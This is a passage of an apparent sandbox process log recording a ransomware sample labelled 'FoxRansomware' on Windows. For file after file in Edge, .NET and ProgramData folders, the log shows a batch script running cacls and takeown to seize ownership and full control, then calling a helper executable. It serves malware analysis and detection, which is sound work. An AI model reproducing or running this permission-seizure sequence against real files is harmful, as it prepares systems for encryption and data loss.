OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6316

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\th.pak""
2⤵
PID:6720

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\th.pak" /E /G Admin:F /C
3⤵
PID:8104

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\th.pak"
3⤵
- Modifies file permissions
PID:6748

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "th.pak" -nobanner
3⤵
PID:4452

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "th.pak" -nobanner
4⤵
PID:2472

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:5484

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\en-US.pak.DATA""
2⤵
PID:3604

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\en-US.pak.DATA" /E /G Admin:F /C
3⤵
PID:6276

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\en-US.pak.DATA"
3⤵
- Modifies file permissions
PID:6984

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "en-US.pak.DATA" -nobanner
3⤵
PID:8060

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "en-US.pak.DATA" -nobanner
4⤵
PID:5412

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:7608

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe""
2⤵
PID:4860

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /E /G Admin:F /C
3⤵
PID:6972

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
3⤵
- Modifies file permissions
PID:7072

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "msedge.exe" -nobanner
3⤵
PID:6464

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "msedge.exe" -nobanner
4⤵
PID:5624

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6372

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\msedge_200_percent.pak""
2⤵
PID:6488

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4788

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\msedge_200_percent.pak" /E /G Admin:F /C
3⤵
PID:4308

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\msedge_200_percent.pak"
3⤵
PID:6484

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "msedge_200_percent.pak" -nobanner
3⤵
PID:6804

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "msedge_200_percent.pak" -nobanner
4⤵
PID:6820

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6824

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\en-US.pak.DATA""
2⤵
PID:6776

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:1196

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\en-US.pak.DATA" /E /G Admin:F /C
3⤵
PID:6376

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\en-US.pak.DATA"
3⤵
PID:5844

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "en-US.pak.DATA" -nobanner
3⤵
PID:6388

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "en-US.pak.DATA" -nobanner
4⤵
PID:1008

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:5164

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\tr.pak.DATA""
2⤵
PID:6468

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:388

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\tr.pak.DATA" /E /G Admin:F /C
3⤵
PID:6476

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\tr.pak.DATA"
3⤵
PID:6616

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "tr.pak.DATA" -nobanner
3⤵
PID:3304

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "tr.pak.DATA" -nobanner
4⤵
PID:2040

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6932

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\tr.pak.DATA""
2⤵
PID:5392

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:7100

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\tr.pak.DATA" /E /G Admin:F /C
3⤵
PID:5480

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\tr.pak.DATA"
3⤵
- Modifies file permissions
PID:1004

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "tr.pak.DATA" -nobanner
3⤵
PID:5512

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "tr.pak.DATA" -nobanner
4⤵
PID:5272

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6056

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\msedge.dll.sig.DATA""
2⤵
PID:5320

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\msedge.dll.sig.DATA" /E /G Admin:F /C
3⤵
PID:6016

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\msedge.dll.sig.DATA"
3⤵
PID:6108

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "msedge.dll.sig.DATA" -nobanner
3⤵
PID:4168

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "msedge.dll.sig.DATA" -nobanner
4⤵
PID:7352

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:1832

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Trust Protection Lists\Mu\Analytics.DATA""
2⤵
PID:4632

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Trust Protection Lists\Mu\Analytics.DATA" /E /G Admin:F /C
3⤵
PID:6432

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Trust Protection Lists\Mu\Analytics.DATA"
3⤵
PID:5244

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "Analytics.DATA" -nobanner
3⤵
PID:7272

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "Analytics.DATA" -nobanner
4⤵
PID:5388

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:7344

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Trust Protection Lists\Sigma\Advertising.DATA""
2⤵
PID:5832

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:6664

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Trust Protection Lists\Sigma\Advertising.DATA" /E /G Admin:F /C
3⤵
PID:4600

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Trust Protection Lists\Sigma\Advertising.DATA"
3⤵
- Modifies file permissions
PID:8108

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "Advertising.DATA" -nobanner
3⤵
PID:8116

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "Advertising.DATA" -nobanner
4⤵
PID:7120

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:7940

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\v8_context_snapshot.bin.DATA""
2⤵
PID:5864

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\v8_context_snapshot.bin.DATA" /E /G Admin:F /C
3⤵
PID:5364

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\v8_context_snapshot.bin.DATA"
3⤵
PID:4972

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "v8_context_snapshot.bin.DATA" -nobanner
3⤵
PID:7000

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "v8_context_snapshot.bin.DATA" -nobanner
4⤵
PID:2900

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:7196

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\WidevineCdm\manifest.json.DATA""
2⤵
PID:7252

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:7212

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\WidevineCdm\manifest.json.DATA" /E /G Admin:F /C
3⤵
PID:32

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\WidevineCdm\manifest.json.DATA"
3⤵
- Modifies file permissions
PID:7556

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "manifest.json.DATA" -nobanner
3⤵
PID:4432

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "manifest.json.DATA" -nobanner
4⤵
PID:7540

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:7440

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Trust Protection Lists\Mu\Entities""
2⤵
PID:7300

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Trust Protection Lists\Mu\Entities" /E /G Admin:F /C
3⤵
PID:7564

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Trust Protection Lists\Mu\Entities"
3⤵
PID:7624

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "Entities" -nobanner
3⤵
PID:7304

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "Entities" -nobanner
4⤵
PID:6132

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6160

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Trust Protection Lists\Sigma\Entities""
2⤵
PID:7668

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:7648

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Trust Protection Lists\Sigma\Entities" /E /G Admin:F /C
3⤵
PID:5816

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Trust Protection Lists\Sigma\Entities"
3⤵
PID:5500

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "Entities" -nobanner
3⤵
PID:5548

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "Entities" -nobanner
4⤵
PID:5020

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6008

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\VisualElements\LogoDev.png""
2⤵
PID:6600

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\VisualElements\LogoDev.png" /E /G Admin:F /C
3⤵
PID:6816

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\VisualElements\LogoDev.png"
3⤵
PID:7452

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "LogoDev.png" -nobanner
3⤵
PID:7848

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "LogoDev.png" -nobanner
4⤵
PID:6516

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:1408

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml""
2⤵
PID:7884

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml" /E /G Admin:F /C
3⤵
PID:7932

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2184

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "AssemblyList_4_extended.xml" -nobanner
3⤵
PID:7804

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "AssemblyList_4_extended.xml" -nobanner
4⤵
PID:7788

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:7348

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\Download\{F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}\122.0.2365.52\MicrosoftEdge_X64_122.0.2365.52.exe""
2⤵
PID:7088

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\Download\{F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}\122.0.2365.52\MicrosoftEdge_X64_122.0.2365.52.exe" /E /G Admin:F /C
3⤵
PID:7896

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\Download\{F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}\122.0.2365.52\MicrosoftEdge_X64_122.0.2365.52.exe"
3⤵
- Modifies file permissions
PID:7900

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "MicrosoftEdge_X64_122.0.2365.52.exe" -nobanner
3⤵
PID:7976

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "MicrosoftEdge_X64_122.0.2365.52.exe" -nobanner
4⤵
PID:8056

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6740

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Locales\en-US.pak""
2⤵
PID:5308

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Locales\en-US.pak" /E /G Admin:F /C
3⤵
PID:5256

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Locales\en-US.pak"
3⤵
PID:7712

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "en-US.pak" -nobanner
3⤵
PID:8168

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "en-US.pak" -nobanner
4⤵
PID:3876

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:8092

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Locales\tr.pak""
2⤵
PID:7128

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:6504

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Locales\tr.pak" /E /G Admin:F /C
3⤵
PID:7864

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Locales\tr.pak"
3⤵
PID:6832

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "tr.pak" -nobanner
3⤵
PID:8008

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "tr.pak" -nobanner
4⤵
PID:8004

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6712

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\msedge_100_percent.pak.DATA""
2⤵
PID:5680

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:6840

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\msedge_100_percent.pak.DATA" /E /G Admin:F /C
3⤵
PID:6524

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\msedge_100_percent.pak.DATA"
3⤵
- Modifies file permissions
PID:5988

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "msedge_100_percent.pak.DATA" -nobanner
3⤵
PID:2064

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "msedge_100_percent.pak.DATA" -nobanner
4⤵
PID:5352

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6860

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\msedge_200_percent.pak.DATA""
2⤵
PID:4440

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:6632

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\msedge_200_percent.pak.DATA" /E /G Admin:F /C
3⤵
PID:8012

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\msedge_200_percent.pak.DATA"
3⤵
PID:8184

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "msedge_200_percent.pak.DATA" -nobanner
3⤵
PID:6560

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "msedge_200_percent.pak.DATA" -nobanner
4⤵
PID:2232

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6212

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1""
2⤵
PID:6112

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1" /E /G Admin:F /C
3⤵
PID:6328

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1"
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:6848

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "OfficeIntegrator.ps1" -nobanner
3⤵
PID:5992

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "OfficeIntegrator.ps1" -nobanner
4⤵
PID:6084

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:5444

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""
2⤵
PID:3452

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C
3⤵
PID:4860

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5852

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "watermark.png" -nobanner
3⤵
PID:5868

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "watermark.png" -nobanner
4⤵
PID:6668

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:7964

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""
2⤵
PID:6628

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C
3⤵
PID:5960

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"
